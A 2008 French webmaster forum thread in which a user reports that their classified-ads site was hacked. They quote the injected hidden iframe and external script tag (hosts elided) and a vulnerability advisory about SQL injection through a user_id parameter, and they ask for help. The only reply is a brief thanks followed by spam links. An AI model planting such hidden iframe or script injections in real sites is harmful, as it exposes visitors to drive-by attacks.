La Communauté Webmaster  forum rss


  Forum-webmaster
  Technique - programmation
  PHP / MySQL
(Modérateurs: Shain, Jey, erwinol, Lilian, lauryv, ToToMaStEr)
  Site piraté
« Précédent Suivant »
Pages: [1] Descendre
Répondre    Aviser des réponses    Envoyer le sujet    Imprimer
  Auteur  Sujet: Site piraté  (Lu 884 fois)
Site piraté
« sur: le 07-04-2008 a 16:21:22 »
lechtimi
Membre récent
*

Hors-Ligne

Messages: 4



Je suis un lama!

Voir le Profil    WWW
Répondre avec citation

Bonjour
Cela fait deux jours que mon site est piraté. Le hacker est passé par .../admin/config/templates_news/
et là il mit une ligne de commande (<div id="stats" style="visibility:hidden;" width='1' height='1'><iframe src ="http://www......com" frameborder='0' height='1' width='1'></iframe></div> <script type="text/javascript" src="http://...."></script>)
J’utilise un script de petites annonces (PHP Classifields version 7.1c).
J’ai cherché sur le web les failles de sécurité de ce script j’en ai trouvé deux (dont une que j’ai corrigé) et celle là :
Description :
ajann a découvert une vulnérabilité dans PHP Classifieds, qui pourrait être exploitée par des personnes malintentionnées pour conduire des attaques SQL.
L'entrée passée au paramètre "user_id" dans detail.php n'est pas correctement filtrée avant d'être utilisée dans une requête SQL. Cela pourrait être exploité pour manipuler les interrogations SQL en injectant du code SQL arbitraire.
La vulnérabilité est confirmée en version 7.1b. Les autres versions pourraient également être affectées.

Solutions :
Editez le code source pour s'assurer que l'entrée est correctement filtrée.


Le problème c’est que je n’y pige rien en php, quelqu’un pourrait il m’aider à regarder ce fichier detail.php
Merci

Rapporter au modérateur  

Re:Site piraté
« Répondre #1 sur: le 09-04-2008 a 08:45:19 »
hoangthuong
Membre récent
*

Hors-Ligne

Sexe: Male
Messages: 11



Je suis un larma!

Voir le Profil    WWW
Répondre avec citation

merci pour le signaler! 

Rapporter au modérateur  

www.clickegal.com
www.maychu.net
www.autodetectip.com
Répondre    Aviser des réponses    Envoyer le sujet    Imprimer
Pages: [1] Monter
« Précédent Suivant »
Sauter à: 

Votre statut : Invité
Vous devez être membre pour participer.
 
 
Let’s Encrypt : le certificat SSL gratuit
Tester votre site internet sur différents navigateurs
[WordPress] Des problèmes avec l’administration ?
Rappel : Mettez à jour vos CMS et vos sites E-commerce
Le .fr fête ses 25 années d’existence !
Mesurer votre audience en temps réel avec BubbleStat
Porter réclamation contre Google Panda ?
Zlio n’est plus …
 
 
 
 
 

Copyright (c) Devclic 2002 - 2026 - Tous droits réservés

creation site internet strasbourg